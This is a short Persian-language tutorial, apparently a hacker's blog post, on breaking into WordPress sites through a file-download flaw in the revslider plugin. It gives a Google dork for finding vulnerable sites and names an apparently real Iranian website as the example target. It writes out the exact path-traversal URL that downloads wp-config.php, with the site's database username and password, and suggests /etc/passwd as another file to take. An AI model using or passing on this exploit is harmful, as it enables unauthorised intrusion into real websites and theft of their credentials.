سلام دوستان امروز میخوایم یک سایت وردپرسی را با پلاگین revslider هک کنیم
باگی که این پلاگین داره : local file download
دورک گوگل : revslider.php "index of"
خب دوستان ما با استفاده از این باگ میتونیم هر فایلی که بخوایم دانلود کنیم ما اینجا میخوایم فایل wp-config.php را دانلود کنیم همونطور که میدونید این فایل حاوی یوزر و پسورد دیتابیس سایت هست
خب حالا یک سایت را باز میکنیم مثلا من سایت زیر را باز کردم:
http://partotaprayan.ir/wp-content/plugins/revslider
خب حالا ادرس را به این تغییر میدیم:
http://partotaprayan.ir/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
خب حالا اگر اینتر کنیم فایل wp-config.php دانلود میشه به جای این فایل میتونیم فایل etc/passwd
VIRUS Nero 007 http://attacker.blog.ir